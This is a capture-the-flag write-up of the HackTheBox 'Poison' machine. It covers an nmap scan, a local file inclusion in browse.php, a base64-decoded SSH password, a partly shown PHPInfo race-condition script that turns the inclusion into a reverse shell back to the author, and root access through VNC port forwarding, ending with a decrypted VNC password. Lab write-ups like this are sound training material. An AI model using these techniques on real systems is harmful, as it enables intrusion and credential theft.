Poison is an Medium box, getting initial is by finding the LFI and doing race condition or we can get the ssh password of the user directly by decoding the base64 and root is port forwarding VNC to our machine and login it as root.
Let’s Begin with our Initial Nmap Scan.
Nmap Scan Results
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0) | ssh-hostkey: | 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA) | 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA) |_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519) 80/tcp open ssl/http Apache/2.4.29 (FreeBSD) PHP/5.6.32 |_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: FreeBSD 11.0-RELEASE - 12.0-CURRENT (97%), FreeBSD 11.0-STABLE (95%), FreeBSD 11.0-CURRENT (94%), FreeBSD 11.0-RELEASE (94%), FreeBSD 9.1-STABLE (92%), FreeBSD 7.0-RELEASE (91%), FreeBSD 12.0-CURRENT (90%), Sony Playstation 4 or FreeBSD 10.2-RELEASE (90%), FreeBSD 7.0-RELEASE-p2 - 7.1-PRERELEASE (89%), FreeNAS 9.10 (FreeBSD 10.3-STABLE) (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 203.44 ms 10.10.14.1 2 203.51 ms 10.10.10.84
This webpage contains some php files, the
Scriptname will helps us to diplay them.
Here I tried to view
phpinfo and it actually worked and also note that parameter helps to locate the files.
Likewise I started checking all the files. Here we can see one more file called
Getting User Shell
Checking that file reveals that it contains some base64 encoded stuff and its 13times encoded.
So I just decoded that multiple times using CyberChef and I got a password thing.
We know the
backup.php uses a parameter called
file so I tried for any LFI possible and I got
/etc/passwd Here can see another user called charix.
Tried login with ssh with the creds we got
charix : Charix!2#4%6&8(0
We know that we can view PHP Info and there is also LFI and that uses race condition and can turn an LFI vulnerability to a remote code execution (RCE) vulnerability. There is a python script for this.
And I changed some few things.
- Give the exact location of phpinfo.php
- Change the GET request to /browse.php?file= because this is where we found LFI
REQ1="""POST /phpinfo.php?a="""+padding+""" HTTP/1.1\r HTTP_ACCEPT: """ + padding + """\r HTTP_USER_AGENT: """+padding+"""\r Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r Content-Length: %s\r Host: %s\r \r %s""" %(len(REQ1_DATA),host,REQ1_DATA) #modify this to suit the LFI script LFIREQ="""GET /browse.php?file=%s HTTP/1.1\r User-Agent: Mozilla/4.0\r Proxy-Connection: Keep-Alive\r Host: %s\r
- Added my IP address and the port which I need to Listen
Now if I run the script
I got the shell as
When checking the home directory, I found
Downloaded to my machine and extracted that, it asked for password and I used the same Charix ssh password and it extracted.
But the file looks different.
When checking the running process, I found that VNC is running as root.
charix@Poison:~ % ps aux . . . root 529 0.0 0.9 23620 9064 v0- I 05:59 0:00.22 Xvnc :1 -desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800
I checked whether the port is open and port 5901 is the port usually VNC runs.
charix@Poison:~/.vnc % netstat -an Active Internet connections (including servers) Proto Recv-Q Send-Q Local Address Foreign Address (state) tcp4 0 0 10.10.10.84.64487 10.10.14.20.3333 ESTABLISHED tcp4 0 0 10.10.10.84.80 10.10.14.20.41928 CLOSE_WAIT tcp4 0 44 10.10.10.84.22 10.10.14.20.36254 ESTABLISHED tcp4 0 0 127.0.0.1.25 *.* LISTEN tcp4 0 0 *.80 *.* LISTEN tcp6 0 0 *.80 *.* LISTEN tcp4 0 0 *.22 *.* LISTEN tcp6 0 0 *.22 *.* LISTEN tcp4 0 0 127.0.0.1.5801 *.* LISTEN tcp4 0 0 127.0.0.1.5901 *.* LISTEN udp4 0 0 *.514 *.*
So I did a local port forwarding of the port 5901 to my machine.
root@kali:~/CTF/HTB/Boxes/Poison# ssh -L 5901:127.0.0.1:5901 firstname.lastname@example.org
Now We can try connecting to it by using vncviewer and it asks for password, So I guessed that the
secret file we got from the zip can be password.
And It worked I logged in as root.
We own the box!!
We can decrypt the VNC password using this tool.
root@kali:~/CTF/HTB/Boxes/Poison/vncpasswd.py# python vncpasswd.py -d -f secret Decrypted Bin Pass= 'VNCP@$$!' Decrypted Hex Pass= '564e435040242421'